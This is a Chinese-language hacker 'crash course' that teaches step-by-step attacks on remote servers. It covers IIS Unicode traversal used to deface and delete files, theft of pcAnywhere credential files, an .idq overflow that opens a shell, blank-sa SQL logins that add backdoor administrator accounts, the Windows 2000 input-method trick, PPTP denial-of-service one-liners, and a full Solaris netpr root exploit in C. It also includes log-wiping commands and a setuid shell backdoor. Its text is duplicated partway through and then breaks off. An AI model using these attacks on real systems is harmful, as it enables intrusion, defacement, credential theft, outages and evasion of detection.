******************************************
影子鷹安全網絡 kawen
Www.CnHacker.Cn
Www.ChinaEHacker.Net
黑客培訓基地
安全服務中心
******************************************
終於決定要寫下這份速成教材了,好讓一些正準備步入黑客殿堂的朋友和一些正在步入黑客殿堂的朋友可以很快的找到感覺.因爲是速成所以裏面的一些理論上的東東會被X掉,大家如果要學的話可以找書看看,以下都是攻擊的步驟(不準用在國內的機子上)
1 UNICODE漏洞
這是老漏洞了,但對於新手來說很好用,而且事實證明現在仍有很多的機子有這種漏洞,OK我們開始
先用掃描器掃到有UNICODE漏洞的機子,(注意漏洞的編碼方式有所不同有的是..%CI%IC.. 用的是..%C0%AF..當然還有其它的方式, 具體根據你的掃描器掃出的結果爲標準
我們在流覽器(IE)的地址欄中輸入
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir
這時你可以看到它的系統目錄但我們要的是主頁面放置的目錄
在輸入
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:/inetpub/wwwroot
看到了吧,目錄中的INDEX.HTML INDEX.ASP DEFAULT.ASP DEFAULT.ASP等等就是它的主頁面,
我們來換它的頁面
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:/winnt/system32/cmd.exe+ccc.exe
http://ip/scripts/ccc.exe?/c+echo+Hacked+by+KAWEN+ >+c:/inetpub/wwwroot/default.asp
OK
成功了,此時它的主頁面被換成了HACKED BY KAWEN
大家可以看看
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:/winnt/system32/cmd.exe+ccc.exe 執行後是複製,如果換成這個呢
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+DEL+c:/winnt/system32/cmd.exe
沒錯就是刪除了
知道怎麼做了吧
呵呵
2利用PCANWHERE攻擊網站
現在開始入正題了,剛纔只是熱身
由於NT的機器一般使用PCAnyWhere進行遠程管理,因此如果能夠得到PCAnyWhere遠程連接的帳號和密碼,那麼就能遠程連接到主機。 ( http://fxyong.3322.net/getpwd.zip )便可以取得帳號和密碼
Telnet IP 5631
我們可以看看PCANYWHERE開了沒
使用Unicode漏洞+ PCanyWhere密碼查看工具
首先我們要DOWN一個可以破 Pcanywhere的工具
http://www.symantec.com/
OK 我們現在要找到主機上的*.CIF文件
在IE中輸入 http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir c:/*.cif /s
一般Citempl.cif爲系統默認的密碼文件,因此我們需要SA.CIF文件。 複製該文件到網站目錄下。
需要知道網站目錄,可以通過ida,idq漏洞進行得到,也可以去尋找網站中的一個圖片文件,比如Tscontent.gif文件,然後去查找該文件:使用命令 dir c:/ Tscontent.gif /s
比如網站目錄爲c:/inetpub/wwwroot/ 一般都有是啦 呵呵
密碼文件所在目錄:c:/Program Files/pcANYWHERE/DATA
下面執行Copy命令:
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy c:/Program Files/pcANYWHERE/DATA/SA.CGI c:/inetpub/wwwroot/
顯示1 file(s) copied,就表示複製成功了。
使用IE下載該文件
使用 http://IP/sa.cif 就可以下載該文件了。
使用PCanyWhere密碼查看工具得到用戶名和密碼
3利用.idq漏洞
爲了方便大家可以看懂下面說的是什麼可以先到這裏來看看
http://snake12.top263.net/IISOverflow/IISOverflow.htm
一共有兩個版本.一個是GUI版本.一個是命令行版本.
這裏我們來說CUI版本,反正都差不多了,關鍵是要多試
首先我們要找到有.IDQ漏洞的機子,可以用流光掃一下
運行軟件
在被攻擊IP地址後面寫上對方的IP.端口號一般不需要改動.
左面選擇操作系統類型.先選擇IIS5 English Win2k Sp0吧~
軟件的默認綁定CMD.EXE的端口是813.不改了.用默認吧~~~
點擊IDQ溢出~~OK~~出現發送Shellcode成功的提示了.
接着我們用NC,你可以到到盟下載 WWW.CNHONKER.COM
C:/>nc -vv XXX.XXX.XXX.XXX 813
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:/WINNT/system32>
OK!!!上來了
你現在有SYSTEM權限,不錯吧,該做什麼不用我教了吧,比如爲自已留下個後門
net user hacker password /add '添加一給名爲hacker,密碼爲passwod的用戶!
net localgroup administrators hacker /add ' 把剛纔創建的用戶加入 Admnistrators組
OK我們在來看看DOS版本
下載軟件後會有個運行文件,它太長了,將它必名爲KAWEN
D:/>KAWEN
運行參數: 操作系統類型 目的地址 web端口 溢出端口
支持的操作系統 類型: ----
0 -- IIS5中文Win2k Sp0
1 -- IIS5中文Win2k Sp1
2 -- IIS5中文Win2k Sp2
3 -- IIS5 English Win2k Sp0
4 -- IIS5 English Win2k Sp1
5 -- --not support -- IIS5 English Win2k Sp2
6 -- IIS5 Japanese Win2k Sp0
7 -- IIS5 Japanese Win2k Sp1
8 -- --not support -- IIS5 Japanese Win2k Sp2
D:/>KAWEN 3 XXX.XXX.XXX.XXX80 456
連接目的機器 XXX.XXX.XXX.XXX:80 OK.
發送shellcode 到 XXX.XXX.XXX.XXX:80 OK
現在,你可以 連接 該主機的 端口 456了,good luck.!
開始吧
D:/>nc -vv XXX.XXX.XXX.XXX 456
mail.rycf.org [XXX.XXX.XXX.XXX] 456 (?): connection refused
sent 0, rcvd 0: NOTSOCK
沒成功.試試sp1.
D:/>KAWEN 4 XXX.XXX.XXX.XXX 80 888
連接目的機器 XXX.XXX.XXX.XXX:80 OK.
發送shellcode 到 XXX.XXX.XXX.XXX:80 OK
現在,你可以 連接 該主機的 端口 888了,good luck.!
D:/>nc -vv XXX.XXX.XXX.XXX 888
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 888 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:/WINNT/system32>
看看我們又成功了
4 SQL攻擊網站
這個也很方便,呵呵,上次在對美國大戰中也有不少兄弟是用這種方法的,來看看吧
我們需要小榕的流光作爲武器,到WWW.NETEYES.COM去DOWN一個
運行流光然後按快捷鍵ctrl+r搜索!
選擇aql!輸入開始和結束的IP!掃描吧!到搜索結束!察看流光最下面的視圖!格式如下:
用戶名 密碼 地址
sa 211.21.220.28
sa 211.21.220.26
sa 211.21.220.197
其中《null》表示密碼爲空!
雙擊其中一項(或在工具……>SQL登錄)!會彈出一個dos窗口!如果過一會該窗口消失!沒戲了!對方不支持遠程登錄!在換一個!如果過一會出現如下的字樣:
SQL Remote Cmd For Fluxay 2001 by Assassin 1995 - 2000. Thanks to Eyas!
Connect to 211.21.220.28 MSSQL Server Success, Type Command in Prompt.
SQLCmd>
那表示已經登錄上了對方的主機!然後
SQLCmd>net user ‘察看用戶!如果不能察看,說明sa權限不夠,那也沒戲,換其他的方法!或是走人!有時用net user察看成功!再試試
SQLCmd>net user administrator ’察看Admin的情況(可知是否在線)如果失敗,撤退吧,
沒戲,換方法! 沒有權限,但是如果可以的話
下一步:
SQLCmd>net user hacker password /add '添加一給名爲hacker,密碼爲passwod的用戶!
SQLCmd>net localgroup administrators hacker /add ' 把剛纔創建的用戶加入 Admnistrators組
好了,告一段落,下面啓動DOS用剛創建的用戶進行ipc$
net use //*.*.*.*/ipc$ "password" /user:"hacker" '很熟悉吧!IPC$開始了!
執行成功的話!搞吧!刪除!上傳!下載!要什麼!隨你!
例如copy c:/hacker/index.htm //IP/c$/inetpub/wwwroot/default.htm (IP爲它的IP)
幹什麼,換他的主頁啊!呵呵!
據我的實踐!針對臺灣的主機!另一方法是用剛創建的用戶名和密碼用CuteFtp登錄!就象管理自己的站點一樣!任意刪除創建Html頁面!此方法對美國的主機沒有成功過!我都是IPC$搞定的!
以上的原理是用SQL開門!用IPC$進門做作administrator可以作的事!但對於SQL主機!Administrator一般沒有對數據庫刪除或創建的權限!此時可以down下他的sam文件解密(怎麼DOWN?暈,看看我在上面UNICODE中寫的教材)!默認用戶名SQLAgentCmdExec,然後用天行的SQlBrowse登錄就可以對數據庫任意操作了!
5 利用輸入法漏洞
要說老美真不是東西,這麼大個洞現在還尚存人間,也好,大家可以練練手
1、用端口掃瞄程序掃IP的3389端口,得到xx.xx.xx.xx。
2、運行windows2000終端客戶程序,在服務器輸入框裏填入:xx.xx.xx.xx ,連接。
3、出現windows2000的登陸窗口,按下CTRL+SHIFT鍵,出現全拼輸入法。
4、在輸入法狀態條上按mouse右鍵,選擇幫助,選擇輸入指南,選擇"選項"按右鍵。
5、選擇"跳轉到URL",輸入:c:/winnt/system32/cmd.exe.
6、選擇"保存到磁盤"。
7、選擇目錄:c:/inetpub/scripts/
8、打開IE,輸入:xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c:/ (知道了吧)
9、輸入:xx.xx.xx.xx/scripts/cmd.exe?/c+echo+BEIJING+
>c:/inetpub/wwwroot/default.asp
還有一種方法
1.掃描 3389 port 終端服務默認;
2.用終端客戶端程序進行連接;
3.按ctrl+shift調出全拼輸入法(其他似乎不行),點鼠標右鍵(如果其幫助菜單發灰,就趕快趕下家吧,人家打補丁了),點幫助,點輸入法入門;
4.在"選項"菜單上點右鍵--->跳轉到URL",輸入:c:/winnt/system32/cmd.exe.(如果不能確定NT系統目錄,則輸入:c:/ 或d:/ ……進行查找確定);
5.選擇"保存到磁盤" 選擇目錄:c:/inetpub/scripts/,因實際上是對方服務器上文件自身的複製操作,所以這個過程很快就會完成;
6.打開IE,輸入: http://ip/scripts/cmd.exe?/c dir 怎麼樣?有cmd.exe文件了吧?這我們就完成了第一步;
7. http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat
8. http://ip/scripts/cmd.exe?/c echo net user guest elise>>go.bat
9. http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest>>go.bat
10. http://ip/scripts/cmd.exe?/c type go.bat 看看我們的批文件內容是否如下:
net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
11.在"選項"菜單上點右鍵--->跳轉到URL",輸入:c:/inetpub/scripts/go.bat --->在磁盤當前位置執行;
12.呵呵,大功告成啦,這樣我們就激活了服務器的geust帳戶,密碼爲:elise,超級用戶呢! (我喜歡guest而不是建立新帳戶,這樣似乎不易被發現些),
最後一定別不記的X掉自已的腳印
del+C:/winnt/system32/logfiles/*.*
del+C:/winnt/ssytem32/config/*.evt
del+C:/winnt/system32/dtclog/*.*
del+C:/winnt/system32/*.log
del+C:/winnt/system32/*.txt
del+C:/winnt/*.txt
del+C:/winnt/*.log
6 教你DoS攻擊微軟的PPTP
呵呵,大家沒有看錯,的確是微軟的,我們先看看PPTP是個什麼東東PPTP(Piont-to-point Tunneling Protocol 點對點傳輸協議)是一個用以建立VPN的網絡協議. 此協議需TCP(端口1723)和GRE以完成工作.
易收攻擊系統:
* Dell PowerEdge 2200 with Intel 10/100 adapter, 256 MB RAM, NT Server 4.0
* Dell Dimension XPS M200s with 3Com 905B adapter, 64 MB RAM, NT Server 4.0
安全的系統:
* HP Vectra XA with AMD PCNet integrated Ethernet, 128 MB RAM, NT Workstation 4.0
* Dell Latitude CPx with 3Com 3CCFEM656 PC Card adapter, 128 MB RAM, NT Workstation 4.0
* Generic dual PII (Asus motherboard) with 3Com 980x adapter, 256 MB RAM, NT Server 4.0
* Dell Dimension XPS T550 with 3Com 905C-TX adapter, 128 MB RAM, NT Workstation 4.0
如何實現:
~~~~~~~~~
*需要的工具*
1.UNIX box(例如linux,*bsd....)
2.netcat ( http://www.l0pht.com/~weld/netcat/ )
3.apsend ( http://www.elxsi.de/ )
4.ipsend ( http://coombs.anu.edu.au/~avalon/ )
OK,這就好說了,
我們來看它的三個BUG
1 TCP端口1723
此弱點只在prior至SP6的機器上有效。並不是所有的機器都存在這個漏洞;請在Unix 操作系統內鍵入以下:
$ nc 1723 < /dev/zero
如機器存在此漏洞, 目標主機將在幾秒種之內藍屏,並有如下錯誤:
STOP 0x0A (0x0, 0x2, 0x0, 0x0) IRQL_NOT_LESS_OR_EQUAL
再次提醒,此弱點只對部分機器有效
2 GRE
此弱點對所有Service pack有效
在目標機器上,打開任務管理器選擇“運行”。並打開 一個DOS窗口(開始-運行-CMD).在Unix類操作系統上:
$ apsend -d --protocol 47 -m 0 -q
在目標主機上你將看到任務管理器內內核記憶的數字將緩慢上升。最終,這些數字將停止增加;此時, CPU在一段時間內有可能被100%佔用。現在你可以試着在命令提示符後鍵入一個命令例如DIR,這時你將看 到一個信息說提示操作系統已不可能完成要執行的命令
3弱點三:GRE
此弱點同樣對所有的Service pack有效。請在Unix操作系統上:
#!/bin/csh
foo:
ipsend -i -P gre > /dev/null
goto foo
目標主機很快會藍屏,大概需要50個數據包。
明白了吧
7 UNIX攻擊
這裏爲了方便我們用finger 0@ip 來找UNIX的薄弱機器
C:/>finger 0@IP
xxx.xxx.xxx.xxx]
Login Name TTY Idle When Where
daemon ??? < . . . . >
bin ??? < . . . . >
sys ??? < . . . . >
jeffrey ??? pts/0 203.66.149.11
daniel ??? 437 114cm.kcable.
jamie ??? 0 203.66.162.68
postgres ??? pts/2 203.66.162.80
nsadmin ??? 768 203.66.19.50
ho ??? 390 61.169.209.106
house18 ??? pts/1 203.66.250.1
tong ??? pts/0 210.226. 42.69
jliu ??? pts/0 203.66.52.87
ptai ??? < . . . . >
看到了嗎,這裏的LOGIN下的就是我們要的用戶名了
比如jeffrey,Daniel,Jamie,postgres
下面我們就來入侵
C:/>telnet xxx.xxx.xxx.xxx
一般的情況下我們都是猜密碼,怎麼猜??就是上面LOGIN下的用戶名讓它又做用戶名和密碼呀,事實上總有一些人爲了方便是這麼設置的
login: ptai (***輸入用戶名***)
Password: **** (***輸入密碼***)
Login incorrect (***登陸失敗***)
login: jliu
Password:
Login incorrect
$ login: tong
Password:
Last login: Mon Jul 2 13:21:55 from 210.226. 42.69 (***這個用戶上次登陸時的IP***)
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
You have mail. (***HOHO~登陸成功啦***)
看看這不就進來了
$ uname –a (***查看系統版本和補丁信息***)
$ set (***查看一些系?潮淞啃畔?**)
$w 看看用戶情況
$ gcc 我們看看有沒有編輯器,以後你就知道有什麼用了
gcc: No input files
看到沒有GCC呀
$ ls -al
total 14
drwxrwxr-x 2 delex staff 512 Jul 4 18:28 .
drwxr-xr-x 35 root root 1024 May 7 10:46 ..
-rw-r--r-- 1 delex staff 144 May 2 10:46 .profile
-rw------- 1 root staff 320 Jul 4 18:52 .sh_history
-rw-r--r-- 1 delex staff 124 May 2 10:46 local.cshrc
-rw-r--r-- 1 delex staff 581 May 2 10:46 local.login
-rw-r--r-- 1 delex staff 562 May 2 10:46 local.profile
$ cat /etc/passwd (***檢查/etc/passwd***)
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
dennis:x:1005:20::/export/home/dennis:/bin/sh
oracle:x:1001:100::/export/home/oracle:/bin/sh
render7:x:9589:101::/export/home/render7:/bin/sh
$ ls -al / (***查看根目錄是否有.rhosts等文件***)
計算機輸入信息略
$ netstat -an|grep LISTEN (***查看有沒有可疑端口***)
*.111 *.* 0 0 0 0 LISTEN
*.21 *.* 0 0 0 0 LISTEN
*.23 *.* 0 0 0 0 LISTEN
*.514 *.* 0 0 0 0 LISTEN
*.513 *.* 0 0 0 0 LISTEN
*.512 *.* 0 0 0 0 LISTEN
*.540 *.* 0 0 0 0 LISTEN
*.79 *.* 0 0 0 0 LISTEN
*.37 *.* 0 0 0 0 LISTEN
*.7 *.* 0 0 0 0 LISTEN
*.9 *.* 0 0 0 0 LISTEN
*.13 *.* 0 0 0 0 LISTEN
*.19 *.* 0 0 0 0 LISTEN
….
$ cd /tmp
$ ls -al
好像沒有什麼問題我們來提升權限
$ set
$ uname -a
SunOS develop 5.7 Generic_106541-14 sun4u sparc SUNW,Ultra-5_10
$ cd /tmp
$ cat > test.c (***用cat命令寫一個文件***)
這是核心呀,這就是拿到ROOT權限中重要的一步
*## copyright LAST STAGE OF DELIRIUM dec 1999 poland *://lsd-pl.net/ #*/
/*## /usr/lib/lp/bin/netpr #*/
/* requires to specify the address of a host with 515 port opened */
#define NOPNUM 4000
#define ADRNUM 1200
#define ALLIGN 3
char shellcode[]=
"/x20/xbf/xff/xff" /* bn,a */
"/x20/xbf/xff/xff" /* bn,a */
"/x7f/xff/xff/xff" /* call */
"/x90/x03/xe0/x20" /* add %o7,32,%o0 */
"/x92/x02/x20/x10" /* add %o0,16,%o1 */
"/xc0/x22/x20/x08" /* st %g0,[%o0+8] */
"/xd0/x22/x20/x10" /* st %o0,[%o0+16] */
"/xc0/x22/x20/x14" /* st %g0,[%o0+20] */
"/x82/x10/x20/x0b" /* mov 0xb,%g1 */
"/x91/xd0/x20/x08" /* ta 8 */
"/bin/ksh"
;
char jump[]=
"/x81/xc3/xe0/x08" /* jmp %o7+8 */
"/x90/x10/x00/x0e" /* mov %sp,%o0 */
;
static char nop[]="/x80/x1c/x40/x11";
main(int argc,char **argv){
char buffer[10000],adr[4],*b,*envp[2];
int i;
printf("copyright LAST STAGE OF DELIRIUM dec 1999 poland //lsd-pl.net//n");
printf("/usr/lib/lp/bin/netpr solaris 2.7 sparc/n/n");
if(argc==1){
printf("usage: %s lpserver/n",argv[0]);
exit(-1);
}
*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+7124+2000;
envp[0]=&buffer[0];
envp[1]=0;
b=&buffer[0];
sprintf(b,"xxx=");
b+=4;
for(i=0;i<1+4-((strlen(argv[1])%4));i++) *b++=0xff;
for(i=0;i
for(i=0;i
*b=0;
b=&buffer[5000];
for(i=0;i
for(i=0;i
*b=0;
execle("/usr/lib/lp/bin/netpr","lsd","-I","bzz-z","-U","x!x","-d",argv[1],
"-p",&buffer[5000],"/bin/sh",0,envp);
}
^D
(***這裏是按ctrl + d 結束寫文件,你用vi來寫也可以,ftp,rcp等上傳也可以。***)
(***源程序在 http://lsd-pl.net/files/get?SOLARIS/solsparc_netpr ***)
$ ls -al /tmp (***查看test.c是否建立***)
找到了吧,哪我們就成功的建立了
$ gcc -o test test.c 編輯它,使它溢出
$ ./test
copyright LAST STAGE OF DELIRIUM dec 1999 poland //lsd-pl.net/
/usr/lib/lp/bin/netpr solaris 2.7 sparc
usage: ./test lpserver
$ ./test localhost
copyright LAST STAGE OF DELIRIUM dec 1999 poland //lsd-pl.net/
/usr/lib/lp/bin/netpr solaris 2.7 sparc
# id
uid=1035(delex) gid=20(staff) euid=0(root) (***成功獲得root***)
OK,想做什麼就看你的了下面是一些題外話了
# mkdir /usr/lib/...
# cp /bin/ksh /usr/lib/…/.x (***做個簡單的後門***)
# chmod +s /usr/lib/…/.x
# cat /etc/hosts (***看看這個網絡多大***)
以下是在上面所要用到的掃描器和原代碼
SuperScan 3.0 http://www.cnhonker.com/tmp/SuperScan.zip
SecureCRT 3.3 http://www.cnhonker.com/tmp/SecureCRT3.3.zip
裏面所用到的有些程序代碼請到 http://lsd-pl.net/ 或 http://www.hack.co.za 查找。
其實每個操作系統都有漏洞,簡單的說我們只要找到該系統對應的漏洞然後編輯它,使它溢出就可以了,這也是黑客最常用的手法
8,D.O.S
呵呵,還記的對白宮的DOS之戰嗎,呵呵,哪還不來試試
下載軟件
FakePing的工具 Http://www.patching.net/shotgun/FakePing.exe
下載 udpflood.zip
安裝網址: http://202.102.230.155/netsafe/software/hacker/attack.htm
9 備註
還有一些很好的漏洞資料請大家好好學學
IIS 漏 洞 整 理
http://www.net228.com/bbs/cgi-bin/topic.cgi?forum=9&topic=33
利用wu-ftpd2.x(site exec bug)取得root權限
http://www.net228.com/bbs/cgi-bin/topic.cgi?forum=9&topic=38
入侵檢測系統(IDS)簡介 轉載
http://www.net228.com/bbs/cgi-bin/topic.cgi?forum=9&topic=32
FRONTPAGE漏洞的執行
http://www.net228.com/bbs/cgi-bin/topic.cgi?forum=9&topic=63
ASP漏洞(1)
http://www.net228.com/bbs/cgi-bin/topic.cgi?forum=9&topic=59
ASP漏洞(2)
http://www.net228.com/bbs/cgi-bin/topic.cgi?forum=9&topic=60
ASP漏洞(3)
http://www.net228.com/bbs/cgi-bin/topic.cgi?forum=9&topic=61
CGI漏洞
http://www.net228.com/bbs/cgi-bin/topic.cgi?forum=9&topic=55
IIS漏洞及應用
http://www.net228.com/bbs/cgi-bin/topic.cgi?forum=9&topic=49
漏洞掃描器大集合
http://www.net228.com/bbs/cgi-bin/topic.cgi?forum=9&topic=87
好了,總算是完成了,大家只要認真的看了,就一定會在技術上有進一步的提高,當然以後大家就只有自已學了,寫的不好,請大家見諒
影子鷹安全網絡 kawen
Www.CnHacker.Cn
Www.ChinaEHacker.Net
黑客培訓基地
安全服務中心
******************************************
終於決定要寫下這份速成教材了,好讓一些正準備步入黑客殿堂的朋友和一些正在步入黑客殿堂的朋友可以很快的找到感覺.因爲是速成所以裏面的一些理論上的東東會被X掉,大家如果要學的話可以找書看看,以下都是攻擊的步驟(不準用在國內的機子上)
1 UNICODE漏洞
這是老漏洞了,但對於新手來說很好用,而且事實證明現在仍有很多的機子有這種漏洞,OK我們開始
先用掃描器掃到有UNICODE漏洞的機子,(注意漏洞的編碼方式有所不同有的是..%CI%IC.. 用的是..%C0%AF..當然還有其它的方式, 具體根據你的掃描器掃出的結果爲標準
我們在流覽器(IE)的地址欄中輸入
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir
這時你可以看到它的系統目錄但我們要的是主頁面放置的目錄
在輸入
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:/inetpub/wwwroot
看到了吧,目錄中的INDEX.HTML INDEX.ASP DEFAULT.ASP DEFAULT.ASP等等就是它的主頁面,
我們來換它的頁面
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:/winnt/system32/cmd.exe+ccc.exe
http://ip/scripts/ccc.exe?/c+echo+Hacked+by+KAWEN+ >+c:/inetpub/wwwroot/default.asp
OK
成功了,此時它的主頁面被換成了HACKED BY KAWEN
大家可以看看
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:/winnt/system32/cmd.exe+ccc.exe 執行後是複製,如果換成這個呢
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+DEL+c:/winnt/system32/cmd.exe
沒錯就是刪除了
知道怎麼做了吧
呵呵
2利用PCANWHERE攻擊網站
現在開始入正題了,剛纔只是熱身
由於NT的機器一般使用PCAnyWhere進行遠程管理,因此如果能夠得到PCAnyWhere遠程連接的帳號和密碼,那麼就能遠程連接到主機。 ( http://fxyong.3322.net/getpwd.zip )便可以取得帳號和密碼
Telnet IP 5631
我們可以看看PCANYWHERE開了沒
使用Unicode漏洞+ PCanyWhere密碼查看工具
首先我們要DOWN一個可以破 Pcanywhere的工具
http://www.symantec.com/
OK 我們現在要找到主機上的*.CIF文件
在IE中輸入 http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir c:/*.cif /s
一般Citempl.cif爲系統默認的密碼文件,因此我們需要SA.CIF文件。 複製該文件到網站目錄下。
需要知道網站目錄,可以通過ida,idq漏洞進行得到,也可以去尋找網站中的一個圖片文件,比如Tscontent.gif文件,然後去查找該文件:使用命令 dir c:/ Tscontent.gif /s
比如網站目錄爲c:/inetpub/wwwroot/ 一般都有是啦 呵呵
密碼文件所在目錄:c:/Program Files/pcANYWHERE/DATA
下面執行Copy命令:
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy c:/Program Files/pcANYWHERE/DATA/SA.CGI c:/inetpub/wwwroot/
顯示1 file(s) copied,就表示複製成功了。
使用IE下載該文件
使用 http://IP/sa.cif 就可以下載該文件了。
使用PCanyWhere密碼查看工具得到用戶名和密碼
3利用.idq漏洞
爲了方便大家可以看懂下面說的是什麼可以先到這裏來看看
http://snake12.top263.net/IISOverflow/IISOverflow.htm
一共有兩個版本.一個是GUI版本.一個是命令行版本.
這裏我們來說CUI版本,反正都差不多了,關鍵是要多試
首先我們要找到有.IDQ漏洞的機子,可以用流光掃一下
運行軟件
在被攻擊IP地址後面寫上對方的IP.端口號一般不需要改動.
左面選擇操作系統類型.先選擇IIS5 English Win2k Sp0吧~
軟件的默認綁定CMD.EXE的端口是813.不改了.用默認吧~~~
點擊IDQ溢出~~OK~~出現發送Shellcode成功的提示了.
接着我們用NC,你可以到到盟下載 WWW.CNHONKER.COM
C:/>nc -vv XXX.XXX.XXX.XXX 813
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:/WINNT/system32>
OK!!!上來了
你現在有SYSTEM權限,不錯吧,該做什麼不用我教了吧,比如爲自已留下個後門
net user hacker password /add '添加一給名爲hacker,密碼爲passwod的用戶!
net localgroup administrators hacker /add ' 把剛纔創建的用戶加入 Admnistrators組
OK我們在來看看DOS版本
下載軟件後會有個運行文件,它太長了,將它必名爲KAWEN
D:/>KAWEN
運行參數: 操作系統類型 目的地址 web端口 溢出端口
支持的操作系統 類型: ----
0 -- IIS5中文Win2k Sp0
1 -- IIS5中文Win2k Sp1
2 -- IIS5中文Win2k Sp2
3 -- IIS5 English Win2k Sp0
4 -- IIS5 English Win2k Sp1
5 -- --not support -- IIS5 English Win2k Sp2
6 -- IIS5 Japanese Win2k Sp0
7 -- IIS5 Japanese Win2k Sp1
8 -- --not support -- IIS5 Japanese Win2k Sp2
D:/>KAWEN 3 XXX.XXX.XXX.XXX80 456
連接目的機器 XXX.XXX.XXX.XXX:80 OK.
發送shellcode 到 XXX.XXX.XXX.XXX:80 OK
現在,你可以 連接 該主機的 端口 456了,good luck.!
開始吧
D:/>nc -vv XXX.XXX.XXX.XXX 456
mail.rycf.org [XXX.XXX.XXX.XXX] 456 (?): connection refused
sent 0, rcvd 0: NOTSOCK
沒成功.試試sp1.
D:/>KAWEN 4 XXX.XXX.XXX.XXX 80 888
連接目的機器 XXX.XXX.XXX.XXX:80 OK.
發送shellcode 到 XXX.XXX.XXX.XXX:80 OK
現在,你可以 連接 該主機的 端口 888了,good luck.!
D:/>nc -vv XXX.XXX.XXX.XXX 888
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 888 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:/WINNT/system32>
看看我們又成功了
4 SQL攻擊網站
這個也很方便,呵呵,上次在對美國大戰中也有不少兄弟是用這種方法的,來看看吧
我們需要小榕的流光作爲武器,到WWW.NETEYES.COM去DOWN一個
運行流光然後按快捷鍵ctrl+r搜索!
選擇aql!輸入開始和結束的IP!掃描吧!到搜索結束!察看流光最下面的視圖!格式如下:
用戶名 密碼 地址
sa 211.21.220.28
sa 211.21.220.26
sa 211.21.220.197
其中《null》表示密碼爲空!
雙擊其中一項(或在工具……>SQL登錄)!會彈出一個dos窗口!如果過一會該窗口消失!沒戲了!對方不支持遠程登錄!在換一個!如果過一會出現如下的字樣:
SQL Remote Cmd For Fluxay 2001 by Assassin 1995 - 2000. Thanks to Eyas!
Connect to 211.21.220.28 MSSQL Server Success, Type Command in Prompt.
SQLCmd>
那表示已經登錄上了對方的主機!然後
SQLCmd>net user ‘察看用戶!如果不能察看,說明sa權限不夠,那也沒戲,換其他的方法!或是走人!有時用net user察看成功!再試試
SQLCmd>net user administrator ’察看Admin的情況(可知是否在線)如果失敗,撤退吧,
沒戲,換方法! 沒有權限,但是如果可以的話
下一步:
SQLCmd>net user hacker password /add '添加一給名爲hacker,密碼爲passwod的用戶!
SQLCmd>net localgroup administrators hacker /add ' 把剛纔創建的用戶加入 Admnistrators組
好了,告一段落,下面啓動DOS用剛創建的用戶進行ipc$
net use //*.*.*.*/ipc$ "password" /user:"hacker" '很熟悉吧!IPC$開始了!
執行成功的話!搞吧!刪除!上傳!下載!要什麼!隨你!
例如copy c:/hacker/index.htm //IP/c$/inetpub/wwwroot/default.htm (IP爲它的IP)
幹什麼,換他的主頁啊!呵呵!
據我的實踐!針對臺灣的主機!另一方法是用剛創建的用戶名和密碼用CuteFtp登錄!就象管理自己的站點一樣!任意刪除創建Html頁面!此方法對美國的主機沒有成功過!我都是IPC$搞定的!
以上的原理是用SQL開門!用IPC$進門做作administrator可以作的事!但對於SQL主機!Administrator一般沒有對數據庫刪除或創建的權限!此時可以down下他的sam文件解密(怎麼DOWN?暈,看看我在上面UNICODE中寫的教材)!默認用戶名SQLAgentCmdExec,然後用天行的SQlBrowse登錄就可以對數據庫任意操作了!
5 利用輸入法漏洞
要說老美真不是東西,這麼大個洞現在還尚存人間,也好,大家可以練練手
1、用端口掃瞄程序掃IP的3389端口,得到xx.xx.xx.xx。
2、運行windows2000終端客戶程序,在服務器輸入框裏填入:xx.xx.xx.xx ,連接。
3、出現windows2000的登陸窗口,按下CTRL+SHIFT鍵,出現全拼輸入法。
